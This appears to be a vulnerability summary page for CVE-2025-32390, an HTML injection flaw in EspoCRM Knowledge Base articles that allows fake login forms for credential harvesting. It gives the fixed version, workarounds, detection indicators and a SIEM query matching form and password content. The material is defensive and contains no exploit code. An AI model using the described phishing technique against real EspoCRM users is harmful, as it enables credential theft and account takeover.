CVE-2025-32390
📋 TL;DR
EspoCRM versions before 9.0.8 contain an HTML injection vulnerability in Knowledge Base articles that allows authenticated users with read access to create malicious login page imitations. This enables credential harvesting from other users who submit their credentials, which are captured in plain text. All authenticated users with KB article read privileges are affected.
💻 Affected Systems
- EspoCRM
📦 What is this software?
Espocrm by Espocrm
⚠️ Risk & Real-World Impact
Worst Case
Attackers create convincing login page clones for multiple enterprise applications, harvesting credentials across the organization and potentially gaining unauthorized access to sensitive systems.
Likely Case
Internal attackers or compromised accounts create fake login pages within EspoCRM to harvest credentials from other users, leading to account takeover and data breaches.
If Mitigated
With proper access controls and monitoring, exploitation would be limited to isolated credential harvesting attempts that are quickly detected and contained.
🎯 Exploit Status
Exploitation requires authenticated access but is straightforward once authenticated. The advisory provides technical details that could be weaponized.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.0.8
Vendor Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-qrwp-v8v3-hqp2
Restart Required: No
Instructions:
1. Backup your EspoCRM instance and database. 2. Download version 9.0.8 or later from the official repository. 3. Replace the existing installation files with the patched version. 4. Clear the cache from Administration > Clear Cache. 5. Verify the update in Administration > About.
🔧 Temporary Workarounds
Disable Knowledge Base HTML editing
allTemporarily restrict HTML editing capabilities in Knowledge Base articles to prevent injection
Modify EspoCRM configuration to disable rich text/HTML editing for KB articles
Restrict Knowledge Base access
allLimit Knowledge Base read access to only essential users
Adjust role permissions in Administration > Roles to remove Knowledge Base read access from non-essential users
🧯 If You Can't Patch
- Implement strict input validation and output encoding for Knowledge Base article content
- Deploy web application firewall (WAF) rules to detect and block HTML injection attempts
🔍 How to Verify
Check if Vulnerable:
Check EspoCRM version in Administration > About. If version is below 9.0.8, the system is vulnerable.Check Version:
Check Administration > About in EspoCRM web interface or examine version.php file in installation directoryVerify Fix Applied:
After patching, verify version shows 9.0.8 or higher in Administration > About. Test that HTML injection in Knowledge Base articles is properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual Knowledge Base article creation/modification patterns
- Multiple failed login attempts from users who previously accessed KB articles
- Suspicious HTML content in KB article edits
Network Indicators:
- HTTP POST requests containing HTML injection payloads to KB article endpoints
- Unusual traffic patterns to KB article pages
SIEM Query:
source="espocrm" AND (event="knowledge_base_article_edit" AND content CONTAINS "<form" OR content CONTAINS "password")